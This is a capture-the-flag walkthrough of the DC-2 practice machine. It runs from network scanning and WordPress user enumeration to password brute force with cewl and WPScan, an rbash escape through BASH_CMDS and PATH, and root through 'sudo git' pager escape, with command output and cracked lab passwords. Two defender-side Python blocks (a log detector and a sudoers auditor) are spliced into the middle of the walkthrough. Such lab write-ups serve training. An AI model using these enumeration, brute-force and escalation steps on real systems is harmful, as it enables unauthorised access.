This target needs a local DNS mapping first: edit /etc/hosts with vim and add a line of the form <ip> <domain>.
Information gathering:
1. Host discovery:
nmap -sn 192.168.1.1/24
└─# nmap -sn 192.168.1.1/24
MAC Address: 52:95:D3:55:6D:01 (Unknown)
Nmap scan report for 192.168.1.11 (192.168.1.11)
Host is up (0.00064s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for dc-2 (192.168.1.12) // the target's IP
Host is up (0.00044s latency).
2. Port scan:
nmap -sT -p- 192.168.1.12 -n
└─# nmap -sT -p- 192.168.1.12 -n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 23:55 EST
Nmap scan report for 192.168.1.12
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 00:0C:29:61:8E:31 (VMware)
3. Service scan:
nmap -sT -sV -O --version-all -p 80,7744 192.168.1.12
Note that port 7744 here is actually SSH.
└─# nmap -sT -sV -O --version-all -p 80,7744 192.168.1.12
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:61:8E:31 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
4. Web information gathering:
The CMS is identified as WordPress, and flag1 is found:
First gather information with the usual tools:
whatweb http://192.168.1.12
Apache version: 2.4.10
WordPress version: 4.7.10
└─# whatweb http://192.168.1.12
http://192.168.1.12 [301 Moved Permanently] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[192.168.1.12], RedirectLocation[http://dc-2/]
http://dc-2/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[192.168.1.12], JQuery[1.12.4], MetaGenerator[WordPress 4.7.10], PoweredBy[WordPress], Script[text/javascript], Title[DC-2 – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.10]
nikto -host 192.168.1.12
└─# nikto -host 192.168.1.12
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.12
+ Target Hostname: 192.168.1.12
+ Target Port: 80
+ Start Time: 2024-01-22 23:58:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://dc-2/
+ /index.php?: Drupal Link header found with value: ARRAY(0x56271eb823b0). See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2024-01-22 23:59:07 (GMT-5) (39 seconds)
---------------------------------------------------------------------------
WEB:
1. Admin panel scan:
flag1's hint says to use the cewl tool and to log in to the site as one user to find the next flag (if it is not found there, log in as another user).
First scan for admin paths with dirsearch: dirsearch -u http://dc-2
All the hits are backend login pages:
2. Username enumeration:
We use WPScan to enumerate usernames:
wpscan --url http://dc-2/ --enumerate u
Three usernames are found: admin, tom, jerry
└─# wpscan --url http://dc-2/ --enumerate u
[+] URL: http://dc-2/ [192.168.1.12]
[+] Started: Tue Jan 23 01:44:06 2024
[i] User(s) Identified:
[+] admin // username 1
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry // username 2
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom // username 3
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
3. Password brute force:
Following flag1's hint, we generate a password dictionary with cewl
and write the usernames admin, tom, jerry into users.dic
cewl http://dc-2/ -w pwd.dic
└─# cewl http://dc-2/ -w pwd.dic
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# ls -la
总计 12
drwxrwxrwx 2 root root 4096 1月23日 01:52 .
drwxr-xr-x 14 kali kali 4096 1月23日 01:52 ..
-rw-r--r-- 1 root root 1689 1月23日 01:52 pwd.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# vim users.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# ls
pwd.dic users.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# cat users.dic
tom
jerry
admin
Start the brute force:
wpscan --url http://dc-2/ -U users.dic -P pwd.dic
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Log in and see what each account gets:
tom:
There is no Pages section.
jerry:
Here the hint says that if WordPress cannot be used as the way in, look for another entry point.
4. SSH login:
We try logging in over SSH on port 7744:
ssh tom@192.168.1.12 -p 7744
It turns out to be a restricted shell, rbash
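An added defender-side example, not part of this walkthrough: a small detector run over constructed Apache access-log lines that reproduces the three traces the WPScan steps above leave behind (the wp-json users listing, the ?author=N author-id enumeration, and the burst of POSTs to wp-login.php). The log lines, the thresholds and the WPScan user-agent string are assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}

def detect_wp_enumeration(log_text, author_threshold=3, login_threshold=20):
    """Return {ip: [finding, ...]} for the three WPScan behaviours seen above."""
    json_users, author_ids, login_posts = defaultdict(int), defaultdict(set), defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "/wp-json/wp/v2/users" in rec["path"]:        # REST API user listing
            json_users[rec["ip"]] += 1
        m = re.search(r"[?&]author=(\d+)", rec["path"])  # author-id brute forcing
        if m:
            author_ids[rec["ip"]].add(int(m.group(1)))
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            login_posts[rec["ip"]] += 1                  # password guessing
    findings = defaultdict(list)
    for ip, n in json_users.items():
        findings[ip].append(f"REST user listing via wp-json ({n} requests)")
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].append(f"author-id enumeration ({len(ids)} distinct ids)")
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings[ip].append(f"wp-login.php password guessing ({n} POSTs)")
    return dict(findings)

# Constructed sample log (not traffic from the target) mimicking the WPScan run
# above; the user-agent string is an assumption.
_STAMP = "[23/Jan/2024:01:%02d:%02d -0500]"
_UA = '"-" "WPScan/3.8"'
SAMPLE_LOG = "\n".join(
    [f'192.168.1.11 - - {_STAMP % (44, 6)} "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 512 {_UA}']
    + [f'192.168.1.11 - - {_STAMP % (44, 7)} "GET /?author={i} HTTP/1.1" 301 0 {_UA}' for i in range(1, 5)]
    + [f'192.168.1.11 - - {_STAMP % (52, s)} "POST /wp-login.php HTTP/1.1" 200 3218 {_UA}' for s in range(30)]
    + ['192.168.1.20 - - [23/Jan/2024:01:53:00 -0500] "GET /index.php/sample-page/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"']
)
```

Running detect_wp_enumeration(SAMPLE_LOG) reports only 192.168.1.11, with all three findings; the benign client is not flagged.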
└─# ssh tom@192.168.1.12 -p 7744
The authenticity of host '[192.168.1.12]:7744 ([192.168.1.12]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.12]:7744' (ED25519) to the list of known hosts.
tom@192.168.1.12's password:
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
...
...
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi
5. Bypassing rbash:
Environment-variable bypass:
BASH_CMDS[a]=/bin/sh;a // use BASH_CMDS to define a command "a" that runs /bin/sh
$ export PATH=$PATH:/bin/ // append /bin to the exported PATH
$ export PATH=$PATH:/usr/bin // append /usr/bin to the exported PATH
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
jerry@DC-2:/home/tom$
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ../jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
jerry@DC-2:~$
6. Privilege escalation:
First look at SUID binaries for escalation:
find / -perm -u=s -type f 2>/dev/null
jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
The last hint in flag4.txt ("git outta here") tells us to escalate privileges through git:
jerry@DC-2:~$ sudo git -p help config
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
NAME
git-config - Get and set repository or global options
SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] -l | --list
git config [<file-option>] --get-color name [default]
git config [<file-option>] --get-colorbool name [stdout-is-tty]
git config [<file-option>] -e | --edit
DESCRIPTION
You can query/set/replace/unset options with this command. The name is
actually the section and the key separated by a dot, and the value will be
escaped.
Multiple lines can be added to an option by using the --add option. If you
want to update or unset an option which can occur on multiple lines, a POSIX
regexp value_regex needs to be given. Only the existing values that match the
regexp are updated or unset. If you want to handle the lines that do not match
the regex, just prepend a single exclamation mark in front (see also the
!/bin/bash
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# cd ../../root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
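An added hardening check, not part of this walkthrough, that covers both the rbash section and the sudo git escalation above: it parses a sudoers fragment and the command list that compgen -c showed for tom, and flags anything that can open a pager, an editor or a shell. The sudoers content is constructed (the page never prints the real one) and the SHELL_CAPABLE set is an assumption drawn from what this page shows.

```python
import re

# Commands this walkthrough turns into an unrestricted shell: git (sudo git -p
# opens a pager from which a shell is started) and the pager/editor/copy tools
# left in tom's rbash PATH. Grant none under sudo; keep none in a restricted PATH.
SHELL_CAPABLE = {"git", "less", "vi", "scp"}
# user host=(runas) [TAG:] cmd, cmd ...  (minimal sudoers grammar, no aliases)
SUDOERS_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
TAG_RE = re.compile(r"(NOPASSWD|PASSWD|NOEXEC|SETENV):\s*")

def parse_sudoers(text):
    """Yield (user, runas, tags, commands) for each user specification line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        user, _host, runas, spec = m.groups()
        tags, t = set(), TAG_RE.match(spec)
        while t:  # strip leading NOPASSWD: / NOEXEC: ... tags
            tags.add(t.group(1))
            spec = spec[t.end():]
            t = TAG_RE.match(spec)
        cmds = [c.strip() for c in spec.split(",") if c.strip()]
        yield user, runas or "root", tags, cmds

def audit_sudoers(text):
    """Flag non-root rules granting ALL or a shell-capable command."""
    findings = []
    for user, runas, tags, cmds in parse_sudoers(text):
        if user == "root":
            continue
        for cmd in cmds:
            base = cmd.split()[0].rsplit("/", 1)[-1]  # /usr/bin/git -> git
            if cmd == "ALL" or base in SHELL_CAPABLE:
                nopw = " without a password" if "NOPASSWD" in tags else ""
                findings.append(f"{user} may run {cmd} as {runas}{nopw}")
    return findings

def audit_rbash_path(allowed_cmds):
    # Commands in a restricted-shell PATH that can spawn a shell.
    return sorted(c for c in allowed_cmds if c in SHELL_CAPABLE)

# Constructed sudoers fragment; the tom/jerry rules are assumptions.
SAMPLE_SUDOERS = """\
root ALL=(ALL:ALL) ALL
jerry ALL=(root) NOPASSWD: /usr/bin/git
tom ALL=(root) /usr/bin/apt-get update
"""
TOM_RBASH_CMDS = ["less", "scp", "ls", "vi"]  # non-builtins from compgen -c above
```

audit_sudoers(SAMPLE_SUDOERS) reports only the jerry/git rule, and audit_rbash_path(TOM_RBASH_CMDS) reports less, scp and vi; ls is harmless and stays.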